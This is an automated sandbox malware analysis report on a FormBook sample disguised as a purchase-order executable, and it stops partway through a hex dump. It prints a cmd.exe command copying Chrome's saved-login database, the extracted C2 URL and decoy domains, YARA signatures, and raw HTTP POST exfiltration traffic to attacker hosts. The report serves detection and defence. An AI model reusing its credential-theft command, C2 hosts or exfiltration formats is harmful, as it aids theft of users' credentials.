
Windows Analysis Report
PO#12108997.exe

Overview

General Information

Sample Name: PO#12108997.exe
Analysis ID: 626541
MD5: 5f6801fb007ede49a68943ef905b54c6
SHA1: a01e755201a0f7caec5b123db1d26776948d33c4
SHA256: ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
Tags: exe formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • PO#12108997.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\PO#12108997.exe" MD5: 5F6801FB007EDE49A68943EF905B54C6)
    • vbc.exe (PID: 6236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 2488 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}
Source | Rule | Description | Author | Strings
00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x5849:$sqlite3step: 68 34 1C 7B E1
    • 0x595c:$sqlite3step: 68 34 1C 7B E1
    • 0x5878:$sqlite3text: 68 38 2A 90 C5
    • 0x599d:$sqlite3text: 68 38 2A 90 C5
    • 0x588b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      4.0.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.0.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        4.0.vbc.exe.400000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.0.vbc.exe.400000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched
          No Snort rule has matched


          AV Detection

          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}
          Source: PO#12108997.exe | Virustotal: Detection: 34%
          Source: PO#12108997.exe | ReversingLabs: Detection: 61%
          Source: Yara match | File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: PO#12108997.exe | Joe Sandbox ML: detected
          Source: 4.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.vbc.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: PO#12108997.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: PO#12108997.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
          Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
          Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop esi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.10 80
          Source: C:\Windows\explorer.exe | Domain query: www.tyz.world
          Source: C:\Windows\explorer.exe | Domain query: www.madurababe.net
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: Malware configuration extractor | URLs: www.mybenefitassist.com/p12s/
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic | HTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1 | Host: www.tyz.world | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1 | Host: www.madurababe.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 188.114.97.10 188.114.97.10
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 72 46 49 30 70 6f 35 78 42 7e 5f 70 5a 6f 46 76 4c 42 39 6b 58 59 66 34 56 76 56 6e 6b 6b 36 6b 6d 4a 53 39 63 78 4a 54 6f 53 46 51 39 62 78 77 36 36 65 6c 62 66 52 70 72 74 4e 37 79 55 35 59 68 28 66 38 47 77 4d 51 66 43 6d 74 69 30 4e 38 31 74 51 28 70 32 50 56 68 30 38 71 37 4c 4b 39 48 4c 49 49 6b 7e 51 6c 5a 73 33 32 35 48 77 4d 6d 6d 67 46 52 62 54 6c 31 78 35 65 5f 6e 68 71 4c 79 32 57 6a 6f 2d 55 67 48 33 73 45 55 58 78 73 35 4b 72 46 48 71 62 30 55 63 47 30 39 69 59 4e 32 30 6f 5f 6f 35 41 4c 7e 77 49 4d 72 30 36 77 65 54 36 59 6f 6a 34 76 31 71 4f 70 42 51 53 6b 76 67 57 78 72 32 67 45 69 58 7e 44 4c 2d 79 57 47 51 7e 70 73 51 4b 31 57 64 4f 45 71 37 71 75 67 42 45 44 37 63 55 7a 57 58 67 76 45 32 53 34 6c 7a 4e 46 35 55 35 58 78 64 4f 56 31 42 79 73 77 2d 48 43 4a 66 58 62 47 6f 78 64 76 52 55 7a 28 36 74 46 44 4e 32 64 35 37 36 53 64 4c 76 73 50 71 4b 68 41 4e 6a 51 6e 79 73 32 43 53 38 43 33 48 7a 68 45 6e 73 69 4a 73 4c 6c 28 66 32 6d 44 55 58 4c 4d 75 4d 68 4b 76 58 58 75 4e 51 57 77 59 64 6a 61 55 63 54 53 41 56 41 75 6e 64 61 64 52 77 44 44 4e 45 4d 70 59 69 38 77 61 77 4f 47 48 44 55 73 4c 7a 5a 52 49 52 48 37 37 62 38 5a 67 6d 2d 6b 37 63 78 49 37 69 38 5a 48 65 36 49 68 6c 35 78 56 78 69 68 53 6e 5f 6d 6a 78 75 28 5a 59 4b 52 36 4c 6f 70 4a 67 30 37 59 42 51 4a 4a 51 76 39 59 71 49 36 35 67 78 4e 58 6c 30 74 7a 32 75 4d 4b 62 33 55 33 70 71 59 35 74 6d 46 6f 6d 36 52 38 54 41 37 38 6f 47 77 4a 56 4f 65 66 74 41 6e 79 64 4b 52 39 56 47 72 31 4e 66 76 42 41 52 56 6d 45 75 45 54 52 48 35 41 6f 30 33 4e 53 36 
5a 46 30 4d 6d 52 47 72 55 65 5a 63 78 76 55 63 49 66 71 4c 44 77 76 44 59 78 68 48 35 70 5a 6c 74 75 28 4c 45 36 4e 52 47 63 72 32 67 65 6c 66 44 45 45 46 69 51 31 48 6a 57 65 69 6d 6a 56 52 74 75 59 2d 33 58 38 43 52 43 38 4c 4b 78 6d 4b 59 48 72 76 7a 78 28 78 7e 39 64 5f 71 70 50 65 30 50 33 6e 45 6d 50 74 4e 69 46 34 77 2d 43 56 46 2d 68 74 65 5a 69 6f 38 31 79 66 39 69 47 4b 41 57 41 79 33 50 41 30 34 54 75 31 28 4b 30 58 43 69 78 71 49 6f 67 4f 4f 56 52 57 45 5a 57 42 52 4c 79 41 59 69 39 38 54 30 63 37 73 54 41 53 6b 4a 30 65 65 70 43 56 7a 43 70 73 79 7a 28 6f 76 67 56 42 56 48 78 49 42 65 59 36 70 69 5a 5a 71 48 45 45 77 33 73 37 78 4f 53 7a 54 5f 34 70 42 68 74 57 37 37 6b 38 4d 74 6f 62 42 35 28 44 71 47 6f 4d 36 7a 39 56 54 77 38 54 74 5a 4e 42 67 4b 78 74 47 69 44 78 6d 4a 62 48 37 58 76 54 71 64 42 5a 42 50 5a 48 58 76 67 52 39 71 39 64 37 4f 56 73 6c 44 35 4d 4d 54 57 66 47 4e 37 66 50 75 56 52 69 74 76 32 58 5f 76 4b 4a 49 48 69 45 44 4a 49 77 5a 56 70 78 48 30 58 6e 31 59 54 32 4e 71 64 53 66 6b 41
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 